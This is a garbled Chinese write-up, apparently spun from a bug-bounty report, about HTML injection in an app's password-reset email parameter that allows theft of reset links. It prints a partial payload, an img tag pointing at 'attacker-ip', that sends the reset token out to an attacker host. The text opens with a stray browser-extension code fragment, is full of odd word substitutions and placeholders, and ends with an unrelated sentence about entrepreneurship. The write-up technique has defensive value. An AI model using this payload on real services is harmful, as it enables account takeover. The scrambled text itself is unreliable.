URL. }chrome.pageAction.onClicked.addListener(function(tab) {在这篇文章中,我将叙述我在某个 *** 运用中所找到的逻辑缝隙,它存在于“找回暗码”这个功用中,能够让我接收恣意用户的帐号。
尽管最终进行进犯的 *** 是经过垂钓手法,但这个缝隙仍然有满足的要挟。
以下我将方针称为“app”。
当我在测验这个运用的“忘掉暗码”功用时,运用burpsuite抓到了这样一个特别的HTTP数据包:在这个恳求的多个参数中,你应该会立马注意到一个特别的参数emailBody,形似其间掺杂了许多html代码,这或许涉及到找回暗码的某个web模板。
让咱们先测验一下,看是否能够往其间注入html代码。
我先简略的刺进了一个<a>标签,回应如下(即重置暗码的邮件):很好,咱们在重置暗码的链接前刺进了一个click,看样子这是一个规范的HTML注入,后端服务器并没有对用户的数据进行安全过滤就直接运用。
那么,它在实践情况下能到达什么进犯作用呢?我很快想到或许能够试试对其他用户进行垂钓进犯,究竟这个邮件的发送者但是运用官方。
完成这个垂钓进犯,只需刺进一个简略的url即可(刺进方位在[RESET-LINK]之前):<img src="http://attacker-ip/?id=
创业,从办法上来看,创业项目分为实业创业和 *** 创业。